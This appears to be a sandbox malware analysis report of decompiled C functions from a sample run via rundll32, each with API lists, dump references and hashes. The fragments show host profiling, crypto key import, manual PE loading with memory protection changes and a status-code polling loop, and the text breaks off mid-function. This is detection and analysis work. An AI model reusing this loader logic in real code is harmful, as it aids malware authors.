                                      • Opcode ID: 6a4197b0c2b1af57856cd7907494c0f9361539a85b0b05a3c61fd2f9a8770c4d
                                      • Instruction ID: aeb448dfce4e5dfd14163441a774f9cb4315318c9982a487e26d6f187fafb852
                                      • Opcode Fuzzy Hash: 6a4197b0c2b1af57856cd7907494c0f9361539a85b0b05a3c61fd2f9a8770c4d
                                      • Instruction Fuzzy Hash: 0B01D431200209BBEF215F99DC44EDB7B78FF84704F00002AFA809A162D671E814D7A0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 37%
                                      			E044B22D7(void* __ecx) {
                                      				signed int _v8;
                                      				void* _t15;
                                      				void* _t19;
                                      				void* _t20;
                                      				void* _t22;
                                      				intOrPtr* _t23;
                                      
                                      				_t23 = __imp__;
                                      				_t20 = 0;
                                      				_v8 = _v8 & 0;
                                      				 *_t23(3, 0,  &_v8, _t19, _t22, __ecx); // executed
                                      				_t10 = _v8;
                                      				if(_v8 != 0) {
                                      					_t20 = E044B6D63(_t10 + 1);
                                      					if(_t20 != 0) {
                                      						_t15 =  *_t23(3, _t20,  &_v8); // executed
                                      						if(_t15 != 0) {
                                      							 *((char*)(_v8 + _t20)) = 0;
                                      						} else {
                                      							E044B6C2C(_t20);
                                      							_t20 = 0;
                                      						}
                                      					}
                                      				}
                                      				return _t20;
                                      			}

                                      APIs
                                      • GetComputerNameExA.KERNEL32(00000003,00000000,044B57B5,00000000,00000000,?,7477C740,044B57B5), ref: 044B22EF
                                        • Part of subcall function 044B6D63: RtlAllocateHeap.NTDLL(00000000,00000000,044B5D7B), ref: 044B6D6F
                                      • GetComputerNameExA.KERNEL32(00000003,00000000,044B57B5,044B57B6,?,7477C740,044B57B5), ref: 044B230C
                                        • Part of subcall function 044B6C2C: RtlFreeHeap.NTDLL(00000000,00000000,044B5E1D,00000000,?,?,00000000), ref: 044B6C38
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.951691155.00000000044B1000.00000020.10000000.00040000.00000000.sdmp, Offset: 044B0000, based on PE: true
                                      • Associated: 00000003.00000002.951646149.00000000044B0000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.951796245.00000000044B9000.00000002.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.951843562.00000000044BA000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.951894977.00000000044BC000.00000002.10000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_44b0000_rundll32.jbxd
                                      Similarity
                                      • API ID: ComputerHeapName$AllocateFree
                                      • String ID:
                                      • API String ID: 187446995-0
                                      • Opcode ID: be8c69fb8d1745f2743500087cb5c67ae25e2a29b02faa6a2952a94504a89429
                                      • Instruction ID: 5c186c047b2198bb67f74e6a99e4b7ec5d232786c33ec4160eff179bd0f04b44
                                      • Opcode Fuzzy Hash: be8c69fb8d1745f2743500087cb5c67ae25e2a29b02faa6a2952a94504a89429
                                      • Instruction Fuzzy Hash: 42F05B66604205BAEF21D6668C04FEF76FCDBC5650F15109AE984D3141E9B0EE0196F2
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E044B1CD6(signed int __edx, intOrPtr _a4) {
                                      				void* _t3;
                                      				void* _t5;
                                      				void* _t7;
                                      				void* _t8;
                                      				void* _t9;
                                      				signed int _t10;
                                      
                                      				_t10 = __edx;
                                      				_t3 = HeapCreate(0, 0x400000, 0); // executed
                                      				 *0x44ba2d8 = _t3;
                                      				if(_t3 == 0) {
                                      					_t8 = 8;
                                      					return _t8;
                                      				}
                                      				 *0x44ba1c8 = GetTickCount();
                                      				_t5 = E044B6D78(_a4);
                                      				if(_t5 == 0) {
                                      					_t5 = E044B4B89(_t9, _a4); // executed
                                      					if(_t5 == 0) {
                                      						if(E044B6B1C(_t9) != 0) {
                                      							 *0x44ba300 = 1; // executed
                                      						}
                                      						_t7 = E044B3D2C(_t10); // executed
                                      						return _t7;
                                      					}
                                      				}
                                      				return _t5;
                                      			}

                                      APIs
                                      • HeapCreate.KERNEL32(00000000,00400000,00000000,044B5E54,?), ref: 044B1CDF
                                      • GetTickCount.KERNEL32 ref: 044B1CF3
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.951691155.00000000044B1000.00000020.10000000.00040000.00000000.sdmp, Offset: 044B0000, based on PE: true
                                      • Associated: 00000003.00000002.951646149.00000000044B0000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.951796245.00000000044B9000.00000002.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.951843562.00000000044BA000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.951894977.00000000044BC000.00000002.10000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_44b0000_rundll32.jbxd
                                      Similarity
                                      • API ID: CountCreateHeapTick
                                      • String ID:
                                      • API String ID: 2177101570-0
                                      • Opcode ID: 035f2cc928bf71dd8553fe48d511f12622babad8b6a2d4396a78644458ed531a
                                      • Instruction ID: 9a352a23d07196abc34a4f28feb935d29b7bae17d2cfeaf3266791bb5f279e0a
                                      • Opcode Fuzzy Hash: 035f2cc928bf71dd8553fe48d511f12622babad8b6a2d4396a78644458ed531a
                                      • Instruction Fuzzy Hash: D5F06570204701A7FF216F72AD1479636B8AB007C4F10482BE9C1D4281EB79F80096F2
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E044B375F(signed int* __ecx, intOrPtr _a4, signed int* _a8, signed int* _a12) {
                                      				intOrPtr _v12;
                                      				signed int _v20;
                                      				intOrPtr _v24;
                                      				signed int _v60;
                                      				char _v68;
                                      				void* __ebx;
                                      				void* __edi;
                                      				void* __esi;
                                      				intOrPtr _t14;
                                      				signed int* _t16;
                                      				signed int _t25;
                                      				signed int _t26;
                                      				signed int* _t28;
                                      				signed int _t30;
                                      
                                      				_t28 = __ecx;
                                      				_t14 =  *0x44ba368; // 0x4e69618
                                      				_v12 = _t14;
                                      				_t16 = _a12;
                                      				_t30 = 8;
                                      				if(_t16 != 0) {
                                      					 *_t16 =  *_t16 & 0x00000000;
                                      				}
                                      				do {
                                      					_t31 =  &_v68;
                                      					if(E044B227F( &_v68) == 0) {
                                      						goto L16;
                                      					}
                                      					_t30 = E044B6954(_t31, _a4, _v12);
                                      					if(_t30 == 0) {
                                      						_t25 = E044B1CA5(_t31, _t28); // executed
                                      						_t30 = _t25;
                                      						if(_t30 != 0) {
                                      							if(_t30 == 0x102) {
                                      								E044BA000 = E044BA000 + 0xea60;
                                      							}
                                      						} else {
                                      							if(_v24 != 0xc8) {
                                      								_t30 = 0xe8;
                                      							} else {
                                      								_t26 = _v20;
                                      								if(_t26 == 0) {
                                      									_t30 = 0x10d2;
                                      								} else {
                                      									_t28 = _a8;
                                      									if(_t28 != 0) {
                                      										_v60 = _v60 & _t30;
                                      										 *_t28 = _v60;
                                      										_t28 = _a12;
                                      										if(_t28 != 0) {
                                      											 *_t28 = _t26;
                                      										}
                                      									}
                                      								}
                                      							}
                                      						}
                                      					}
                                      					E044B4274( &_v68, 0x102, _t28, _t30);
                                      					L16:
                                      				} while (_t30 == 0x2f19 && WaitForSingleObject( *0x44ba30c, 0) == 0x102);
                                      				return _t30;
                                      			}

                                      APIs
                                      • WaitForSingleObject.KERNEL32(00000000,76DC81D0,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 044B3811
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.951691155.00000000044B1000.00000020.10000000.00040000.00000000.sdmp, Offset: 044B0000, based on PE: true
                                      • Associated: 00000003.00000002.951646149.00000000044B0000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.951796245.00000000044B9000.00000002.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.951843562.00000000044BA000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.951894977.00000000044BC000.00000002.10000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_44b0000_rundll32.jbxd
                                      Similarity
                                      • API ID: ObjectSingleWait
                                      • String ID:
                                      • API String ID: 24740636-0
                                      • Opcode ID: f6eda391ca784a762e52a9c236cb28f6ecb38a207934b3f62cb36cd552a62a72
                                      • Instruction ID: 52bbae00469c2771be04c22cca3207d4b121be75738db5c63345a4209d892027
                                      • Opcode Fuzzy Hash: f6eda391ca784a762e52a9c236cb28f6ecb38a207934b3f62cb36cd552a62a72
                                      • Instruction Fuzzy Hash: DE2158B67002859BEF21CE6BD891AEE76A5BB81354F14802BED81A7240DB74FC4187E0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 34%
                                      			E044B1B6F(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
                                      				intOrPtr _v12;
                                      				void* _v18;
                                      				char _v20;
                                      				intOrPtr _t15;
                                      				void* _t17;
                                      				intOrPtr _t19;
                                      				void* _t23;
                                      
                                      				_v20 = 0;
                                      				asm("stosd");
                                      				asm("stosd");
                                      				asm("stosd");
                                      				asm("stosw");
                                      				_t15 =  *0x44ba348; // 0x9ad5a8
                                      				_t4 = _t15 + 0x44bb3a0; // 0x4e68948
                                      				_t20 = _t4;
                                      				_t6 = _t15 + 0x44bb124; // 0x650047
                                      				_t17 = E044B46CB(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
                                      				if(_t17 < 0) {
                                      					_t23 = _t17;
                                      				} else {
                                      					_t23 = 8;
                                      					if(_v20 != _t23) {
                                      						_t23 = 1;
                                      					} else {
                                      						_t19 = E044B59AE(_t20, _v12);
                                      						if(_t19 != 0) {
                                      							 *_a16 = _t19;
                                      							_t23 = 0;
                                      						}
                                      						__imp__#6(_v12);
                                      					}
                                      				}
                                      				return _t23;
                                      			}











                                      APIs
                                        • Part of subcall function 044B46CB: SysFreeString.OLEAUT32(?), ref: 044B47AA
                                        • Part of subcall function 044B59AE: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,044B5EFA,004F0053,00000000,?), ref: 044B59B7
                                        • Part of subcall function 044B59AE: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,044B5EFA,004F0053,00000000,?), ref: 044B59E1
                                        • Part of subcall function 044B59AE: memset.NTDLL ref: 044B59F5
                                      • SysFreeString.OLEAUT32(00000000), ref: 044B1BD2
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.951691155.00000000044B1000.00000020.10000000.00040000.00000000.sdmp, Offset: 044B0000, based on PE: true
                                      • Associated: 00000003.00000002.951646149.00000000044B0000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.951796245.00000000044B9000.00000002.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.951843562.00000000044BA000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.951894977.00000000044BC000.00000002.10000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_44b0000_rundll32.jbxd
                                      Similarity
                                      • API ID: FreeString$lstrlenmemcpymemset
                                      • String ID:
                                      • API String ID: 397948122-0
                                      • Opcode ID: 80770517ed1e4b8f3f2ca0d3937f438fb972136c46d975360db97b6a6e212864
                                      • Instruction ID: 7c99281ca01f1f4695b689a28e7383f8b08338eb6f813e0973d3017692426339
                                      • Opcode Fuzzy Hash: 80770517ed1e4b8f3f2ca0d3937f438fb972136c46d975360db97b6a6e212864
                                      • Instruction Fuzzy Hash: 27015E32504119BFDF119FA9CC01DEABBB9FB04690F04482AE941E7161E770A912D7E0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 37%
                                      			E00401FB2(void* __eax, intOrPtr _a4) {
                                      
                                      				 *0x4041d0 =  *0x4041d0 & 0x00000000;
                                      				_push(0);
                                      				_push(0x4041cc);
                                      				_push(1);
                                      				_push(_a4);
                                      				 *0x4041c8 = 0xc; // executed
                                      				L004010BE(); // executed
                                      				return __eax;
                                      			}




                                      APIs
                                      • ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(00401BF6,00000001,004041CC,00000000), ref: 00401FD0
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.950458300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000003.00000002.950449846.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.950465136.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.950497345.0000000000405000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.950532385.0000000000406000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_400000_rundll32.jbxd
                                      Similarity
                                      • API ID: DescriptorSecurity$ConvertString
                                      • String ID:
                                      • API String ID: 3907675253-0
                                      • Opcode ID: ecd42516f24ae11830152b655fb12a873813b1f072e7efb964ffb831fc1a0f60
                                      • Instruction ID: 1acf57aef84a5c475451222c9dea1d8de6ae58133c9941aaac2b578c9df51b57
                                      • Opcode Fuzzy Hash: ecd42516f24ae11830152b655fb12a873813b1f072e7efb964ffb831fc1a0f60
                                      • Instruction Fuzzy Hash: A0C04CF4250341A6E710AF40DD8AF457A5177A470DF200629F744381E1C3FA10D4851E
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E044B6C2C(void* _a4) {
                                      				char _t2;
                                      
                                      				_t2 = RtlFreeHeap( *0x44ba2d8, 0, _a4); // executed
                                      				return _t2;
                                      			}





                                      APIs
                                      • RtlFreeHeap.NTDLL(00000000,00000000,044B5E1D,00000000,?,?,00000000), ref: 044B6C38
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.951691155.00000000044B1000.00000020.10000000.00040000.00000000.sdmp, Offset: 044B0000, based on PE: true
                                      • Associated: 00000003.00000002.951646149.00000000044B0000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.951796245.00000000044B9000.00000002.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.951843562.00000000044BA000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.951894977.00000000044BC000.00000002.10000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_44b0000_rundll32.jbxd
                                      Similarity
                                      • API ID: FreeHeap
                                      • String ID:
                                      • API String ID: 3298025750-0
                                      • Opcode ID: 0df6d7566fb076d9e2880ad99e82a8acb85456e2a68d3595bec296d97dff9aea
                                      • Instruction ID: 68a710ba69ab68aa697c621745fff4c1019bacd3563d39aa10abd6c0fd357a68
                                      • Opcode Fuzzy Hash: 0df6d7566fb076d9e2880ad99e82a8acb85456e2a68d3595bec296d97dff9aea
                                      • Instruction Fuzzy Hash: 21B012B1200200ABEB114F00DE04F05BA21E750700F004010B344100B082360C30FB55
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E044B6D63(long _a4) {
                                      				void* _t2;
                                      
                                      				_t2 = RtlAllocateHeap( *0x44ba2d8, 0, _a4); // executed
                                      				return _t2;
                                      			}





                                      APIs
                                      • RtlAllocateHeap.NTDLL(00000000,00000000,044B5D7B), ref: 044B6D6F
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.951691155.00000000044B1000.00000020.10000000.00040000.00000000.sdmp, Offset: 044B0000, based on PE: true
                                      • Associated: 00000003.00000002.951646149.00000000044B0000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.951796245.00000000044B9000.00000002.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.951843562.00000000044BA000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.951894977.00000000044BC000.00000002.10000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_44b0000_rundll32.jbxd
                                      Similarity
                                      • API ID: AllocateHeap
                                      • String ID:
                                      • API String ID: 1279760036-0
                                      • Opcode ID: 8cb3b4e8ab1c4caac68b1c464f166e288b287e177578ee67a737a46eb889c176
                                      • Instruction ID: dd8dc62b0a9e7802c0aab60085532fb76257ccc5ed484177ab37f823d61a332e
                                      • Opcode Fuzzy Hash: 8cb3b4e8ab1c4caac68b1c464f166e288b287e177578ee67a737a46eb889c176
                                      • Instruction Fuzzy Hash: 29B01271104200BBEA014B10DD08F05BB21F750700F004010B344500B082370C60FB44
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.951031091.0000000002D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_2d50000_rundll32.jbxd
                                      Similarity
                                      • API ID: AllocVirtual
                                      • String ID:
                                      • API String ID: 4275171209-0
                                      • Opcode ID: 200654caf8872bfb84d534b6df6c6610af57454f1857a22d0510d06dea24e8a1
                                      • Instruction ID: 7eb2594e5d8990ddd35ca188adcf3182cded05c77c1c2a3232e6550bd979c545
                                      • Opcode Fuzzy Hash: 200654caf8872bfb84d534b6df6c6610af57454f1857a22d0510d06dea24e8a1
                                      • Instruction Fuzzy Hash: DA4105B09002068FDB04CF54C5947AEBBF0FF48304F24856DD858AB341D77AA946CF95
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 85%
                                      			E0040153F(void* __eax) {
                                      				char _v8;
                                      				void* _v12;
                                      				void* __edi;
                                      				void* _t18;
                                      				long _t26;
                                      				long _t29;
                                      				intOrPtr _t40;
                                      				void* _t41;
                                      				intOrPtr* _t42;
                                      				void* _t44;
                                      
                                      				_t41 = __eax;
                                      				_t16 =  *0x4041c0;
                                      				_t33 =  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x4041c0 - 0x69b24f45 &  !( *0x4041c0 - 0x69b24f45);
                                      				_t18 = E00401446( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x4041c0 - 0x69b24f45 &  !( *0x4041c0 - 0x69b24f45),  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x4041c0 - 0x69b24f45 &  !( *0x4041c0 - 0x69b24f45), _t16 + 0x964da0fc,  &_v8,  &_v12); // executed
                                      				if(_t18 != 0) {
                                      					_t29 = 8;
                                      					goto L8;
                                      				} else {
                                      					_t40 = _v8;
                                      					_t29 = E0040113D(_t33, _t40, _t41);
                                      					if(_t29 == 0) {
                                      						_t44 =  *((intOrPtr*)(_t40 + 0x3c)) + _t40;
                                      						_t29 = E004015E3(_t40, _t44);
                                      						if(_t29 == 0) {
                                      							_t26 = E00401A9D(_t44, _t40); // executed
                                      							_t29 = _t26;
                                      							if(_t29 == 0) {
                                      								_push(_t26);
                                      								_push(1);
                                      								_push(_t40);
                                      								if( *((intOrPtr*)( *((intOrPtr*)(_t44 + 0x28)) + _t40))() == 0) {
                                      									_t29 = GetLastError();
                                      								}
                                      							}
                                      						}
                                      					}
                                      					_t42 = _v12;
                                      					 *((intOrPtr*)(_t42 + 0x18))( *((intOrPtr*)(_t42 + 0x1c))( *_t42));
                                      					E0040152A(_t42);
                                      					L8:
                                      					return _t29;
                                      				}
                                      			}














                                      APIs
                                        • Part of subcall function 00401446: GetModuleHandleA.KERNEL32(?,00000020), ref: 0040146A
                                        • Part of subcall function 00401446: GetProcAddress.KERNEL32(00000000,?), ref: 0040148C
                                        • Part of subcall function 00401446: GetProcAddress.KERNEL32(00000000,?), ref: 004014A2
                                        • Part of subcall function 00401446: GetProcAddress.KERNEL32(00000000,?), ref: 004014B8
                                        • Part of subcall function 00401446: GetProcAddress.KERNEL32(00000000,?), ref: 004014CE
                                        • Part of subcall function 00401446: GetProcAddress.KERNEL32(00000000,?), ref: 004014E4
                                        • Part of subcall function 004015E3: LoadLibraryA.KERNEL32(?,?,00000000,?,0040159A), ref: 0040161B
                                        • Part of subcall function 00401A9D: VirtualProtect.KERNEL32(00000000,?,?,?,?,?,00000000,?), ref: 00401AD6
                                        • Part of subcall function 00401A9D: VirtualProtect.KERNEL32(00000000,?,?,?), ref: 00401B4B
                                        • Part of subcall function 00401A9D: GetLastError.KERNEL32 ref: 00401B51
                                      • GetLastError.KERNEL32 ref: 004015BD
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.950458300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000003.00000002.950449846.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.950465136.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.950497345.0000000000405000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000003.00000002.950532385.0000000000406000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_400000_rundll32.jbxd
                                      Similarity
                                      • API ID: AddressProc$ErrorLastProtectVirtual$HandleLibraryLoadModule
                                      • String ID:
                                      • API String ID: 3135819546-0
                                      • Opcode ID: 89dc334e324781066015fc3c795a5eaf2b560c41582afc7c540ed698c9449d8f
                                      • Instruction ID: eea4ea5154a5aefbb647ba05e6a0f56c4ae443b02ca2aac04c595dc78db400c3
                                      • Opcode Fuzzy Hash: 89dc334e324781066015fc3c795a5eaf2b560c41582afc7c540ed698c9449d8f
                                      • Instruction Fuzzy Hash: 4A11E976700601BBC721AED68C84DAB77ECAFC8318700053AEA02BB651EEB4ED058794
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E044B155C(intOrPtr* __edi, void* _a4, intOrPtr _a8, unsigned int _a12) {
                                      				void* _t21;
                                      				void* _t22;
                                      				signed int _t24;
                                      				intOrPtr* _t26;
                                      				void* _t27;
                                      
                                      				_t26 = __edi;
                                      				if(_a4 == 0) {
                                      					L2:
                                      					_t27 = E044B12CA(_a4, 0x80000002, _a8, _a12,  &_a4,  &_a12);
                                      					if(_t27 == 0) {
                                      						_t24 = _a12 >> 1;
                                      						if(_t24 == 0) {
                                      							_t27 = 2;
                                      							HeapFree( *0x44ba2d8, 0, _a4);
                                      						} else {
                                      							_t21 = _a4;
                                      							 *((short*)(_t21 + _t24 * 2 - 2)) = 0;
                                      							 *_t26 = _t21;
                                      						}
                                      					}
                                      					L6:
                                      					return _t27;
                                      				}
                                      				_t22 = E044B1B6F(_a4, _a8, _a12, __edi); // executed
                                      				_t27 = _t22;
                                      				if(_t27 == 0) {
                                      					goto L6;
                                      				}
                                      				goto L2;
                                      			}









                                      APIs
                                        • Part of subcall function 044B1B6F: SysFreeString.OLEAUT32(00000000), ref: 044B1BD2
                                      • HeapFree.KERNEL32(00000000,00000000,00000000,80000002,76DDF710,?,00000000,?,00000000,?,044B21A9,?,004F0053,04E69400,00000000,?), ref: 044B15BF
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.951691155.00000000044B1000.00000020.10000000.00040000.00000000.sdmp, Offset: 044B0000, based on PE: true
                                      • Associated: 00000003.00000002.951646149.00000000044B0000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.951796245.00000000044B9000.00000002.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.951843562.00000000044BA000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.951894977.00000000044BC000.00000002.10000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_44b0000_rundll32.jbxd
                                      Similarity
                                      • API ID: Free$HeapString
                                      • String ID:
                                      • API String ID: 3806048269-0
                                      • Opcode ID: ff016b721504bb2d29923c1118119897882b04eecf1bbd5c0ec3fb18101f3a9d
                                      • Instruction ID: f420ee9d8c12f429fc622ce8afcda250d6b484e9843298771302c068048ef987
                                      • Opcode Fuzzy Hash: ff016b721504bb2d29923c1118119897882b04eecf1bbd5c0ec3fb18101f3a9d
                                      • Instruction Fuzzy Hash: 6E014F32500559BBDF229F94CC11EEB7BA5EF04790F04C419FE459A260D731E960DBE0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 75%
                                      			E044B24B3(void* __ecx, void* __edx, void* _a4, void* _a8) {
                                      				void* _t13;
                                      				void* _t21;
                                      
                                      				_t11 =  &_a4;
                                      				_t21 = 0;
                                      				__imp__( &_a8);
                                      				_t13 = E044B5FBB( &_a4 + 1, 1, _a8, _a4, _a4, _t11); // executed
                                      				if(_t13 == 0) {
                                      					_t21 = E044B6D63(_a8 + _a8);
                                      					if(_t21 != 0) {
                                      						E044B298F(_a4, _t21, _t23);
                                      					}
                                      					E044B6C2C(_a4);
                                      				}
                                      				return _t21;
                                      			}






                                      APIs
                                      • lstrlen.KERNEL32(00000000,00000000,044B58D7,00000000,?,044B1D97,00000000,044B58D7,?,7477C740,044B58D7,00000000,04E695B0), ref: 044B24C4
                                        • Part of subcall function 044B5FBB: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,00000000,00000000,00000000,?,?,?,044B24D8,00000001,044B58D7,00000000), ref: 044B5FF3
                                        • Part of subcall function 044B5FBB: memcpy.NTDLL(044B24D8,044B58D7,00000010,?,?,?,044B24D8,00000001,044B58D7,00000000,?,044B1D97,00000000,044B58D7,?,7477C740), ref: 044B600C
                                        • Part of subcall function 044B5FBB: CryptImportKey.ADVAPI32(?,?,0000001C,00000000,00000000,00000000), ref: 044B6035
                                        • Part of subcall function 044B5FBB: CryptSetKeyParam.ADVAPI32(00000000,00000001,?,00000000), ref: 044B604D
                                        • Part of subcall function 044B5FBB: memcpy.NTDLL(00000000,7477C740,04E695B0,00000010), ref: 044B609F
                                        • Part of subcall function 044B6D63: RtlAllocateHeap.NTDLL(00000000,00000000,044B5D7B), ref: 044B6D6F
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.951691155.00000000044B1000.00000020.10000000.00040000.00000000.sdmp, Offset: 044B0000, based on PE: true
                                      • Associated: 00000003.00000002.951646149.00000000044B0000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.951796245.00000000044B9000.00000002.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.951843562.00000000044BA000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.951894977.00000000044BC000.00000002.10000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_44b0000_rundll32.jbxd
                                      Similarity
                                      • API ID: Crypt$memcpy$AcquireAllocateContextHeapImportParamlstrlen
                                      • String ID:
                                      • API String ID: 894908221-0
                                      • Opcode ID: ab2df5b647b4df5e3cd265bd7860b3d1fb15595c1580771bcf26e35aaa538941
                                      • Instruction ID: 3df8a64e0187c944fe77a66c7dd79ab325fd99f750eed91e8fcb9834485c4274
                                      • Opcode Fuzzy Hash: ab2df5b647b4df5e3cd265bd7860b3d1fb15595c1580771bcf26e35aaa538941
                                      • Instruction Fuzzy Hash: 1DF03A76100109BBDF126E66DC04CEB7BADEF843A4B018027FE48CA115DA71EA559BF0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 93%
                                      			E044B1645(void* __ebx, int* __ecx, void* __edi, void* __esi) {
                                      				int _v8;
                                      				void* _v12;
                                      				void* _v16;
                                      				signed int _t28;
                                      				signed int _t33;
                                      				signed int _t39;
                                      				char* _t45;
                                      				char* _t46;
                                      				char* _t47;
                                      				char* _t48;
                                      				char* _t49;
                                      				char* _t50;
                                      				void* _t51;
                                      				void* _t52;
                                      				void* _t53;
                                      				intOrPtr _t54;
                                      				void* _t56;
                                      				intOrPtr _t57;
                                      				intOrPtr _t58;
                                      				signed int _t61;
                                      				intOrPtr _t64;
                                      				signed int _t65;
                                      				signed int _t70;
                                      				void* _t72;
                                      				void* _t73;
                                      				signed int _t75;
                                      				signed int _t78;
                                      				signed int _t82;
                                      				signed int _t86;
                                      				signed int _t90;
                                      				signed int _t94;
                                      				signed int _t98;
                                      				void* _t101;
                                      				void* _t102;
                                      				void* _t115;
                                      				void* _t118;
                                      				intOrPtr _t121;
                                      
                                      				_t118 = __esi;
                                      				_t115 = __edi;
                                      				_t104 = __ecx;
                                      				_t101 = __ebx;
                                      				_t28 =  *0x44ba344; // 0x69b25f44
                                      				if(E044B7780( &_v8,  &_v12, _t28 ^ 0x889a0120) != 0 && _v12 >= 0x110) {
                                      					 *0x44ba378 = _v8;
                                      				}
                                      				_t33 =  *0x44ba344; // 0x69b25f44
                                      				if(E044B7780( &_v16,  &_v12, _t33 ^ 0x0159e6c7) == 0) {
                                      					_v12 = 2;
                                      					L69:
                                      					return _v12;
                                      				}
                                      				_t39 =  *0x44ba344; // 0x69b25f44
                                      				_push(_t115);
                                      				if(E044B7780( &_v12,  &_v8, _t39 ^ 0xe60382a5) == 0) {
                                      					L67:
                                      					HeapFree( *0x44ba2d8, 0, _v16);
                                      					goto L69;
                                      				} else {
                                      					_push(_t101);
                                      					_t102 = _v12;
                                      					if(_t102 == 0) {
                                      						_t45 = 0;
                                      					} else {
                                      						_t98 =  *0x44ba344; // 0x69b25f44
                                      						_t45 = E044B5450(_t104, _t102, _t98 ^ 0x7895433b);
                                      					}
                                      					_push(_t118);
                                      					if(_t45 != 0) {
